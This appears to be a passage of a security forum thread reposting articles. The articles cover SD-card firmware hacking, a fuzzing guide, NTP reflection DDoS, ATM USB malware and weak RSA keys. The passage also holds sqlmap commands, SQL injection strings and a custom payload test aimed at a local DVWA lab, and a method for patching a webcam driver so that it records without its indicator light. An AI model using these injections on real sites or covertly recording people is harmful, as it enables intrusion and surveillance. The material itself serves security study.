layers that a microcontroller has to potentially handle. The inevitable firmware bugs are now a reality of the flash memory business, and as a result it’s not feasible, particularly for third party controllers, to indelibly burn a static body of code into on-chip ROM. The crux is that a firmware loading and update mechanism is virtually mandatory, especially for third-party controllers. End users are rarely exposed to this process, since it all happens in the factory, but this doesn’t make the mechanism any less real. In my explorations of the electronics markets in China, I’ve seen shop keepers burning firmware on cards that “expand” the capacity of the card — in other words, they load a firmware that reports the capacity of a card is much larger than the actual available storage. The fact that this is possible at the point of sale means that most likely, the update mechanism is not secured. In our talk at 30C3, we report our findings exploring a particular microcontroller brand, namely, Appotech and its AX211 and AX215 offerings. We discover a simple “knock” sequence transmitted over manufacturer-reserved commands (namely, CMD63 followed by ‘A’,'P’,'P’,'O’) that drop the controller into a firmware loading mode. At this point, the card will accept the next 512 bytes and run it as code. From this beachhead, we were able to reverse engineer (via a combination of code analysis and fuzzing) most of the 8051?s function specific registers, enabling us to develop novel applications for the controller, without any access to the manufacturer’s proprietary documentation. Most of this work was done using our open source hardware platform, Novena, and a set of custom flex circuit adapter cards (which, tangentially, lead toward the development of flexible circuit stickers aka chibitronics). Significantly, the SD command processing is done via a set of interrupt-driven call backs processed by the microcontroller. These callbacks are an ideal location to implement an MITM attack. It’s as of yet unclear how many other manufacturers leave their firmware updating sequences unsecured. Appotech is a relatively minor player in the SD controller world; there’s a handful of companies that you’ve probably never heard of that produce SD controllers, including Alcor Micro, Skymedi, Phison, SMI, and of course Sandisk and Samsung. Each of them would have different mechanisms and methods for loading and updating their firmwares. However, it’s been previously noted that at least one Samsung eMMC implementation using an ARM instruction set had a bug which required a firmware updater to be pushed to Android devices, indicating yet another potentially promising venue for further discovery. From the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data. Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind it up with a mortar and pestle). From the DIY and hacker perspective, our findings indicate a potentially interesting source of cheap and powerful microcontrollers for use in simple projects. An Arduino, with its 8-bit 16 MHz microcontroller, will set you back around $20. A microSD card with several gigabytes of memory and a microcontroller with several times the performance could be purchased for a fraction of the price. While SD cards are admittedly I/O-limited, some clever hacking of the microcontroller in an SD card could make for a very economical and compact data logging solution for I2C or SPI-based sensors. Slides from our talk at 30C3 can be downloaded here, or you can watch the talk on Youtube below. Team Kosagi would like to extend a special thanks to .mudge for enabling this research through the Cyber Fast Track program. Tags: flash, hacking, microcontroller, microsd, mitm Sursa: On Hacking MicroSD Cards
  15. 15 minute guide to fuzzing Matt Hillman August 08, 2013 Have you heard about fuzzing but are not sure what it is or if you should do it? This guide should quickly get you up to speed on what it’s all about. What is fuzzing? Fuzzing is a way of discovering bugs in software by providing randomised inputs to programs to find test cases that cause a crash. Fuzzing your programs can give you a quick view on their overall robustness and help you find and fix critical bugs. Fuzzing is ultimately a black box technique, requiring no access to source code, but it can still be used against software for which you do have source code, because it will potentially find bugs more quickly and avoid the need to review lots of code. Once a crash is detected, if you have the source code, it should become much easier to fix. Pros and cons of fuzzing Fuzzing can be very useful, but it is no silver bullet. Here are some of the pros and cons of fuzzing: Pros Can provide results with little effort: once a fuzzer is up and running, it can be left for hours, days or months to look for bugs with no interaction Can reveal bugs that were missed in a manual audit Provides an overall picture of the robustness of the target software Cons Will not find all bugs: fuzzing may miss bugs that do not trigger a full program crash, and may be less likely to trigger bugs that are only triggered in highly specific circumstances The crashing test cases that are produced may be difficult to analyse, as the act of fuzzing does not give you much knowledge of how the software operates internally Programs with complex inputs can require much more work to produce a smart enough fuzzer to get sufficient code coverage Smart and dumb fuzzing Fuzzers provide random input to software. This may be in the form of a network protocol, a file of a certain format or direct user input. The fuzzed input can be completely random with no knowledge of what the expected input should look like, or it can be created to look like valid input with some alterations. A fuzzer that generates completely random input is known as a “dumb” fuzzer, as it has no built-in intelligence about the program it is fuzzing. A dumb fuzzer requires the smallest amount of work to produce (it could be as simplistic as piping /dev/random into a program). This small amount of work can produce results for very little cost – one of fuzzing’s big advantages. However, sometimes a program will only perform certain processing if particular aspects of the input are present. For example, a program may accept a “name” field in its input, and this field may have a “name length” associated with it. If these fields are not present in a form that is valid enough for the program to identify, it may never attempt to read the name. However, if these fields are present in a valid form, but the length value is set to the incorrect value, the program may read beyond the buffer containing the name and trigger a crash. Without input that is at least partly valid, this is very unlikely to happen. In these cases, “smart” fuzzers can be used. These are programmed with knowledge of the input format (i.e. a protocol definition or rules for a file format). The fuzzer can then construct mostly valid input and only fuzz parts of the input within that basic format. The greater the level of intelligence that you build into a fuzzer, the deeper you may be able to go into a protocol or file format’s processing, but the more work you create for yourself. A balance needs to be found between these two extremes. It can be good to begin with a much more dumb fuzzer and increase its intelligence as the code quality of the software you are testing increases. If you get lots of crashes with a simplistic fuzzer, there is no point spending a long time making it more intelligent until the code quality increases to a point where the code requires it. Types of fuzzer Broadly speaking, fuzzers can be split into two categories based on how they create input to programs – mutation-based and generation-based. This section details those categories as well as offering a brief description of a more advanced technique called Evolutionary Fuzzing. Mutation Mutation-based fuzzers are arguably one of the easier types of fuzzer to create. This technique suites dumb fuzzing but can be used with more intelligent fuzzers as well. With mutation, samples of valid input are mutated randomly to produce malformed input. A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. For many programs, this can provide a surprising amount of mileage, as inputs are still often significantly similar enough to a valid input, so that good code coverage can be achieved without the need for further intelligence. You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples to ensure that it only modifies specific parts or that it does not break the overall structure of the input such that it is immediately rejected by the program. Some protocols or file formats will incorporate checksums that will fail if they are modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so that the input is accepted for processing or the only code that will be tested is the checksum validation and nothing else. Two useful techniques that can be used by mutation-based fuzzers are described below. Replay A fuzzer can take saved sample inputs and simply replay them after mutating them. This works well for file format fuzzing where a number of sample files can be saved and fuzzed to provide to the target program. Simple or stateless network protocols can also be fuzzed effectively with replay, as the fuzzer will not need to make lots of legitimate requests to get deep into the protocol. For a more complex protocol, replay may be more difficult as the fuzzer may need to respond in a dynamic way to the program to allow processing to continue deep into the protocol, or the protocol may simply be inherently non-replayable. Man-in-the-Middle or Proxy You may have heard of Man-in-the-Middle (MITM) as a technique used by penetration testers and hackers, but it can also be used for mutation-based network protocol fuzzing. MITM describes the situation where you place yourself in the middle of a client and server (or two clients in the case of peer-to-peer networking), intercepting and possibly modifying messages passed between them. In this way, you are acting like a proxy between the two. The term MITM is generally used when it is not expected that you will be acting like a proxy, but for our purposes the terms are largely interchangeable. By setting your fuzzer up as a proxy, it can mutate requests or responses depending on whether you are fuzzing the server or the client. Again, the fuzzer could have no intelligence about the protocol and simply randomly alter some requests and not others, or it could intelligently target requests at the specific level of the protocol in which you are interested. Proxy-based fuzzing can allow you to take an existing deployment of a networked program and quickly insert a fuzzing layer into it, without needing to make your fuzzer act like a client or server itself. Generation Generation-based fuzzers actually generate input from scratch rather than mutating existing input. Generation-based fuzzers usually require some level of intelligence in order to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation. Generation fuzzers often split a protocol or file format into chunks which they can build up in a valid order, and randomly fuzz some of those chunks independently. This can create inputs that preserve their overall structure, but contain inconsistent data within that structure. The granularity of these chunks and the intelligence with which they are constructed define the level of intelligence of the fuzzer. While mutation-based fuzzing can have a similar effect as generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input’s structure), generating inputs ensures that this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs applying fuzzing to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these cannot be blindly replayed. Evolutionary Evolutionary fuzzing is an advanced technique, which we will only briefly describe here. It allows the fuzzer to use feedback from each test case to learn over time the format of the input. For example, by measuring the code coverage of each test case, the fuzzer can heuristically work out which properties of the test case exercise a given area of code, and it can gradually evolve a set of test cases that cover the majority of the program code. Evolutionary fuzzing often relies on other techniques similar to genetic algorithms and may require some form of binary instrumentation to operate correctly. What are you really fuzzing? Even for relatively dumb fuzzers, it is important to keep in mind what part of the code your test cases are actually likely to hit. To give a simple example, if you are fuzzing an application protocol that uses TCP/IP and your fuzzer randomly mutates a raw packet capture, you are likely to be corrupting the TCP/IP packets themselves and your input is unlikely to get processed by the application at all. Or, if you were testing an OCR program that parsed images of text into real text, but you were mutating the whole of an image file, you could end up testing its image parsing code more often than the actual OCR code. If you wanted to target that OCR processing specifically, you might wish to keep the headers of the image file valid. Likewise, you may be generating input that is so random that it does not pass an initial sanity check in the program, or the code contains a checksum that you do not correct. You are then only testing that first branch in the program, never getting deeper into the program code. Anatomy of a fuzzer To operate effectively, a fuzzer needs to perform a number of important tasks: Generate test cases Record test cases or any information needed to reproduce them Interface with the target program to provide test cases as input Detect crashes Fuzzers often split many of these tasks out into separate modules, for example having one library that can mutate data or generate it based on a definition and another to provide test cases to the target program and so on. Below are some notes on each of these tasks. Test case generation Generating test cases will vary depending on whether mutation-based or generation-based fuzzing is being employed. With either, there will be something that needs randomly transforming, whether it is a field of a particular type or an arbitrary chunk of data. These transformations can be completely random, but it is worth remembering that edge and corner cases can often be the source of bugs in programs. As such, you may wish to favour such cases and include values such as: Very long or completely blank strings Maximum and minimum values for integers on the platform Values like -1, 0, 1 and 2 Depending on what you are fuzzing, there may be specific values or characters that are more likely to trigger bugs. For example: Null characters New line characters Semi-colons Format string values (%n, %s, etc.) Application specific keywords Reproducibility The simplest way to reproduce a test case is to record the exact input used when a crash is detected. However, there are other ways to ensure reproducibility that can be more convenient in certain circumstances. One way to do this is to store the initial seed used for the random component of test case generation, and ensure that all subsequent random behaviour follows a path that can be traced back to that seed. By re-running the fuzzer with the same seed, the behaviour should be reproducible. For example, you may only record the test case number and the initial seed and then quickly re-execute generation with that seed until you reach the given test case. This technique can be useful when the target program may accumulate dependencies based on past inputs. Previous inputs may have caused the program to initialise various items in its memory that are required to be present to trigger the bug. In these situations, simply recording the crashing test case would not be sufficient to reproduce the bug. Interfacing with the target Interfacing with the target program to provide the fuzzed input is often straightforward. For network protocols, it may simply involve sending the test case over the network, or responding to a client request; for file formats, it may simply mean executing the program with a command line argument pointing to the test case. However, sometimes the input is provided in a form that is not trivial to generate in an automated way or where scripting the program to execute each test case has a high overhead and proves to be very slow. Creative thinking in these cases can reveal ways to exercise the relevant piece of code with the right data. For example, this may be performed by instrumenting a program in memory artificially to execute a parsing function with the input provided as an argument entirely in memory. This can remove the need for the program to go through a lengthy loading procedure before each test case, and further speed increases could be obtained by having test cases generated and provided completely in memory rather than going via the hard drive. Crash detection Crash detection is critical for fuzzing. If you cannot accurately determine when a program has crashed, you will not be able to identify a test case as triggering a bug. There are a number of common ways to approach this: Attach a debugger This will provide you with the most accurate results and you can script the debugger to provide you with a crash trace as soon as a crash is detected. However, having a debugger attached can slow programs significantly and this can cause quite an overhead. The fewer test cases you can generate in a given period of time, the fewer chances you have of finding a crash. See if the process disappears Rather than attaching a debugger, you can simply see if the process ID of the target still exists on the system after executing the test case. If the process has disappeared, it probably crashed. You can re-run the test case in a debugger later if you want some more information about the crash, and you can even do this automatically for each crash, while still avoiding the slowdown of having the debugger attached for every case. Timeout If the program normally responds to your test cases, you can set a timeout after which you assume the program has either crashed or frozen. This can also detect bugs that cause the program to become unresponsive but not necessarily to terminate. Whichever method you use, the program should be restarted whenever it crashes or becomes unresponsive, in order to allow fuzzing to continue. Fuzzing quality There are a number of things you can do to measure or improve the quality of your fuzzing. While these are all good things to keep in mind, you may not need to bother with them all if you are already getting lots of unique crashes within a useful timeframe. Speed Possibly one of the most important factors in fuzzing is speed. How many test cases per second/minute can you run? Sensible values will of course depend on the target, but the more test cases you can execute, the more likely you will be to find a crash in a given time period. Fuzzing is random, so every test case is like a lottery ticket, and you want as many of them as you can get. There are lots of things you can do to increase the speed of your test cases, such as improving the efficiency of your generation or mutation routines, parallelising test cases, decreasing timeouts or running programs in “headless” modes where they do not display a GUI. And of course if you want to, you can simply buy faster kit! Categorising crashes Finding crashes is of course only the start of the process. Once you find a crashing test case, you will need to analyse it, work out what the bug is and either fix it or write an exploit for it depending on your motivation. If you have thousands of crashing test cases, this can be quite daunting. By categorising crashes you can prioritise them according to which ones are most interesting to you. This can also help you identify when one test case is triggering the same bug as another, so you only keep the cases relating to unique crashes. In order to do this, you will need some automated information about the crash so you can make a decision. Running the test case with the target attached to a debugger can provide a crash trace which you can parse to find values such as the exception type, register values, stack contents and so on. One tool by Microsoft which can help with this is called, !exploitable (pronounced “bang exploitable”), which works with the Windbg debugger to categorise crashes according to how exploitable it thinks the bug is. Test case reduction As fuzzing randomly alters input, it is common for a crashing test case to have multiple alterations which are not relevant to triggering the bug. Test case reduction is the act of narrowing down a test case to the minimum set of alterations from a valid input required to trigger the bug, so that you only need to focus on that part of the input in your analysis. This reduction can be performed manually, but it can also be performed automatically by the fuzzer. When a crashing test case is encountered, the fuzzer can re-execute the test case several times, gradually reducing the alterations made to the input until the smallest set of changes remains, whilst still triggering the bug. This can simplify your analysis and may also help to categorise crashing test cases as you will know precisely what parts of the input are affected. Code coverage Code coverage is a measure of how much of the program’s code has been executed by the fuzzer. The idea is that the more coverage you get, the more of the program you have actually tested. Measuring code coverage can be tricky and often requires binary instrumentation to track which portions of code are being executed. You can also measure code coverage in different ways, such as by line, by basic block, by branch or by code path. Code coverage is not a perfect measure with regards to fuzzing, as it is possible to execute code without revealing bugs in it, and there are often areas of code that almost never get executed, such as safety error checks that are unlikely to really be needed and are very unlikely to be interesting to us anyway. Nevertheless, some form of code coverage measurement can provide insight into what your fuzzer is triggering within the program, especially when your fuzzing is completely black box and you may not yet know much about the program’s inner workings. Some tools and technologies that may help with code coverage include Pai Mei, Valgrind, DynamoRIO and DTrace. Fuzzing frameworks There are a number of existing frameworks that allow you to create fuzzers without having to work from scratch. Some of these frameworks are complex and it may still take a while to create a working fuzzer for your target; by contrast, others take a very simple approach. A selection of these frameworks and fuzzers is listed here for your reference: Radamsa Radamsa is designed to be easy to use and flexible. It attempts to “just work” for a variety of input types and contains a number of different fuzzing algorithms for mutation. Sulley Sulley provides a comprehensive generation framework, allowing structured data to be represented for generation based fuzzing. It also contains components to help with recording test cases and detecting crashes. Peach The Peach framework can perform smart fuzzing for file formats and network protocols. It can perform both generation- and mutation-based fuzzing and it contains components to help with modelling and monitoring the target. SPIKE SPIKE is a network protocol fuzzer. It requires good knowledge of C to use and is designed to run on Linux. Grinder Grinder is a web browser fuzzer, which also has features to help in managing large numbers of crashes. NodeFuzz NodeFuzz is a nodejs-based harness for web browsers, which includes instrumentation modules to gain further information from the client side. Sursa: https://www.mwrinfosecurity.com/knowledge-centre/15-minute-guide-to-fuzzing/
      • 1
      • Upvote
  16. [h=2]Web Shell: PHP Meterpreter[/h] Sursa: Web Shell: PHP Meterpreter
  17. Meet Parrot Security OS (a Linux Distro) – Pentesting in the cloud! By Henry Dalziel Information Security Blogger Many of our regular readers and Hacker Hotshot community know by now that we enjoy covering news on Linux Pentesting Distro’s, and whilst the heavy hitters such as Kali Linux and BackBox tend to get most of the lime light, we particularly like exposing upcoming distros, and here is one certainly worth blogging about: Parrot Security OS. Linux Penetration Testing distro’s (call them hacking distro’s if you want) basically revolve around the same premise, i.e. storing ‘best of breed’ pentesting tools within an easy to use Operating System that are efficiently updated. Now, the interesting thing about Parrot Security OS is that the team behind it have a novel way of using the cloud to manage the OS. We have to be honest in that we are not entirely sure how the Cloud Pentesting Distro concept works – and for that reason we’d be grateful if any readers could chime in and drop a comment below to help improve this post. Here’s what we do know about this distro, which does have a feeling that it is packing a punch, is the following: First off, that it is based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux, to, in their own words: ‘provide the best penetration and security testing experience.’ Certainly, taking the Debian Kali Linux route is a smart move since it is a tried and tested platform that offers reliability. Another thing we do know, is that the design of the distro, as you would expect from a bunch of Italian Pentesters looks very slick and easy on the eye – and let’s be honest, that is important because if you are anything like us you are spending too much time in front of your monitors. Of interest, and on the subject of Italy, we do note that there are several IT security distro’s that hail from Italy, namely BackBox and CAINE (which is actually more of a forensics distro). Learn more and get a copy of Parrot 0.6 here. Pentesting in the cloud This does intrigue us and how it can be applied to a penetration testers operating system. Does the OS fit into a particular cloud service model? As per the National Institute of Standards and Technology (NIST SP800-145) definition there are three cloud service models. They are: Infrastructure as a Service (IaaS): whereby the provider supplies hardware and network connectivity. The tenant on the other hand is responsible for the virtual machine and the software stack that operates within it. Platform as a Service (PaaS): this is when the tenant supplies the web or database application (for example) that they would like to deploy, and the provider supplies all the necessary components required to run the app. Software as a Service (SaaS): this is the last category whereby the provider supplies the app and all the components necessary for its’ operation. SaaS is meant to be a ‘quick-fix’ for the tenant. In Summary We might be way off the mark here – and if we are – please let us know by dropping a comment below. We will be keeping an eye on the Parrot Security OS so please consider this as your first introduction to what looks like a promising project, and don’t forget where you heard it first! On the subject of penetration distro’s, we had an interesting Hacker Hotshot presentation from Andrew Hoog in which he discussed ‘How To Turn BYOD Risk Into Mobile Security Strength’. The reason we are bringing that up is because Andrew is the co-founder of viaForensics and co-developer of Santoku, a distro that focuses on mobile forensics – another niche and interesting area of IT security. We wish the Parrot (Frozen Box) team all the best and look forward to hearing how the project develops. Sursa: Meet Parrot Security OS (a Linux Distro) - Pentesting in the cloud!
  18. Sqlmap Tricks for Advanced SQL Injection Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello' The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains various parameters, and you don't want sqlmap to test everyting. You can use the --data option to pass any POST parameters. To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser for example). Finally, the --cookie option is used to specify any useful Cookie along with the queries (e.g. Session Cookie). Advanced Attack Sometimes sqlmap cannot find tricky injection points and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA - Damn Vulnerable Web Application), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point. Here is the source of the php file responsible for the Blind SQL Injection exercise located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php: [phpcode]<?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; if (!preg_match('/-BR$/', $id)) $html .= '<pre><h2>Wrong ID format</h2></pre>'; else { $id = str_replace("-BR", "", $id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' if ($num > 0) $html .= '<pre><h2>User exists!</h2></pre>'; else $html .= '<pre><h2>Unknown user!</h2></pre>'; } } ?>[/phpcode] Basically, this code will receive an ID compounded of a numerical value followed by the string "-BR". The application will first validate whether this string is present and will extract the numerical value. Then, it concatenates this value to the SQL query used to check if it is a valid user ID and returns the result ("User exists!”or “Unknown user!"): This page is clearly vulnerable to SQL Injection but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 risk=3 -p id I’m using a valid User-Agent and an authenticated Session Cookie. I’m also forcing sqlmap to test the “id” parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it: To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical Blind SQL Injection instance and I’m lazy, so I don’t want to exploit it manually. For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection. http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit# http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit# Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is: id=1' AND 1=1 #-BR Sqlmap Tweaking How to force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let’s try it with debug information (-v3 option): ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3 I'm still not having any luck. To check what’s going on, we can increase the debug level or set the --proxy=”http://localhost:8080” option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed to the command line. So every query looks like this: id=1’ AND 1=0 -BR. Obviously, it is not working. Below is how you should handle this situation. The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file and you can add your proper tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it. Here is my new test I added to my payload.xml file: Existing user ID: Non-existing user ID: A valid query (True): A non-valid query (False): <test> <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE] #</vector> <request> <payload>AND [RANDNUM]=[RANDNUM] #</payload> </request> <response> <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison> </response> <details> <dbms>MySQL</dbms> </details> </test> This test simply forces the use of the # character (MySQL comment) in every payload. The original test was using the <comment> tag as a sub-tag of the <request> tag. As we saw, it is not working with suffixes. Now we explicitly want this special character included at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payload.xml file, but here is a summary of the settings I used: <title>: the title… duh. <stype>: type of test, 1 means boolean-based blind SQL injection. <level>: level of this test, set to 1 (can be set to anything you want as long as you set the right --level option in the command line). <risk>: risk of this test (like the <level> tag, can be set to anything you want as long as you set the right --risk option in the command line). <clause>: in which clause this will work, 1 means WHERE or HAVING clauses. <where>: where to insert the payload, 1 means appending the payload to the parameter original value. <vector>: the payload used for exploitation and also used to check if the injection point is a false positive. <request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). Here the sub-tag <payload> has to be used. <response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). Here the sub-tag <comparison> has to be used. <details>: set the database in used: MySQL. Here the sub-tag <dbms> has to be used. Let's see if this works: Great! Now we can easily exploit this with sqlmap. sqlmap is a very powerful tool and highly customizable, I really recommend it if you’re not already using it. It can save you a lot of time during a penetration test. Posted by Christophe De La Fuente on 30 December 2013 Sursa: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs Anterior
      • 1
      • Upvote
  19. Cash machines raided with infected USB sticks By Chris Vallance BBC Radio 4 Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year. The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs. Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Computing Congress in Hamburg, Germany. The crimes also appear to indicate the thieves mistrusted each other. The two researchers who detailed the attacks have asked for their names not to be published Access code The thefts came to light in July after the lender involved noticed several its ATMs were being emptied despite their use of safes to protect the cash inside. After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks. The malware was installed onto the ATMs via USB sticks Once the malware had been transferred they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered. To activate the code at the time of their choosing the thieves typed in a 12-digit code that launched a special interface. Analysis of software installed onto four of the affected machines demonstrated that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind. The researchers said this allowed the attackers to focus on the highest value banknotes in order to minimise the amount of time they were exposed. But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo. To counter this risk the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money. The correct response varied each time and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed. If they did nothing the machine would return to its normal state after three minutes. The researchers added the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse. However, they added that the approach did not extend to the software's filenames - the key one was called hack.bat. Sursa: BBC News - Cash machines raided with infected USB sticks
  20. Defcon 21 - Evolving Exploits Through Genetic Algorithms Description: This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning & evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections, let genetic algorithms take over and create lethal exploits to PWN sites for you! soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As member of the team, he has participated and won Open Capture the Flag DC 16, 18, and 19. Soen also participated in the DDTEK competition in DEF CON 20. 0xSOEN@blogspot.com For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Evolving Exploits Through Genetic Algorithms
  21. [h=1]Attackers Wage Network Time Protocol-Based DDoS Attacks[/h]Kelly Jackson Higgins Attackers have begun exploiting an oft-forgotten network protocol in a new spin on distributed denial-of-service (DDoS) attacks, as researchers spotted a spike in so-called NTP reflection attacks this month. The Network Time Protocol, or NTP, syncs time between machines on the network, and runs over port 123 UDP. It's typically configured once by network administrators and often is not updated, according to Symantec, which discovered a major jump in attacks via the protocol over the past few weeks. "NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks," says Allan Liska, a Symantec researcher in blog post last week. Attackers appear to be employing NTP for DDoSing similar to the way DNS is being abused in such attacks. They transmit small spoofed packets requesting a large amount of data sent to the DDoS target's IP address. According to Symantec, it's all about abusing the so-called "monlist" command in an older version of NTP. Monlist returns a list of the last 600 hosts that have connected to the server. "For attackers the monlist query is a great reconnaissance tool. For a localized NTP server it can help to build a network profile. However, as a DDoS tool, it is even better because a small query can redirect megabytes worth of traffic," Liska explains in the post. Monlist modules can be found in NMAP as well as in Metasploit, for example. Metasploit includes monlist DDoS exploit module. The spike in NTP reflection attacks occurred mainly in mid-December, with close to 15,000 IPs affected, and dropped off significantly after December 23, according to Symantec's data,. Symantec recommends that organizations update their NTP implementations to version 4.2.7, which does not use the monlist command. Another option is to disable access to monlist in older versions of NTP. "By disabling monlist, or upgrading so the command is no longer there, not only are you protecting your network from unwanted reconnaissance, but you are also protecting your network from inadvertently being used in a DDoS attack," Liska says. Sursa: Attackers Wage Network Time Protocol-Based DDoS Attacks -- Dark
  22. Detection of Widespread Weak Keys in Network Devices Abstract RSA and DSA can fail catastrophically when used with malfunctioning random number generators, but the extent to which these problems arise in practice has never been comprehensively studied at Internet scale. We perform the largest ever network survey of TLS and SSH servers and present evidence that vulnerable keys are surprisingly widespread. We find that 0.75% of TLS certificates share keys due to insufficient entropy during key generation, and we suspect that another 1.70% come from the same faulty implementations and may be susceptible to compromise. Even more alarmingly, we are able to obtain RSA private keys for 0.50% of TLS hosts and 0.03% of SSH hosts, because their public keys shared nontrivial common factors due to entropy problems, and DSA private keys for 1.03% of SSH hosts, because of insufficient signature randomness. We cluster and investigate the vulnerable hosts, finding that the vast majority appear to be headless or embedded devices. In experiments with three software components commonly used by these devices, we are able to reproduce the vulnerabilities and identify specific software behaviors that induce them, including a boot-time entropy hole in the Linux random number generator. Finally, we suggest defenses and draw lessons for developers, users, and the security community. Download Download the conference version or the more detailed extended version. @InProceedings{weakkeys12, author = {Nadia Heninger and Zakir Durumeric and Eric Wustrow and J. Alex Halderman}, title = {Mining Your {P}s and {Q}s: {D}etection of Widespread Weak Keys in Network Devices}, booktitle = {Proceedings of the 21st {USENIX} Security Symposium}, month = aug, year = 2012 } Sursa: https://factorable.net/paper.html
  23. C. Apoi C++. Apoi orice porcarie iti pofteste inima.
  24. [h=3]How to disable webcam light on Windows[/h] By Robert Graham In recent news, it was revealed the FBI has a "virus" that will record a suspect through the webcam secretly, without turning on the LED light. Some researchers showed this working on an older Macbook. In this post, we do it on Windows. [h=3]Hardware, firmware, driver, software[/h] In theory, the indicator light should be a hardware function. When power is supplied to the sensor, it should also be supplied to an indicator light. This would make the light impossible to hack. However, I don't think anybody does this. In some cases, it's a firmware function. Webcams have their own wimpy microprocessors and run code directly within the webcam. Control the light is one of those firmware functions. Some, like Steve Jobs, might describe this as "hardware" control, because it resides wholly within the webcam hardware, but it's still a form of software. This is especially true because firmware blobs are unsigned, and therefore, can be hacked. In some cases, it's the driver, either within the kernel mode driver that interfaces at a low-level with the hardware, or a DLL that interfaces at a high-level with software. [h=3]How to[/h] As reverse engineers, we simply grab these bits of software/firmware/drivers and open them in our reverse engineering tools, like IDApro. It doesn't take us long to find something to hack. For example, on our Dell laptop, we find the DLL that comes with the RealTek drivers for our webcam. We quickly zero in on the exported function "TurnOnOffLED()". We can quickly make a binary edit to this routine, causing it to return immediately without turning on the light. Dave shows in the in the video below. First, the light turns on as normal, then he stops the webcam, replaces the DLLs with his modified ones, and then turns on the webcam again. As the following video shows, after the change, the webcam is recording him recording the video, but the light is no longer on. [h=3]The deal with USB[/h] Almost all webcams, even those inside your laptop's screen, are USB devices. There is a standard for USB video cameras, the UVC standard. This means most hardware will run under standard operating systems (Windows, Mac, 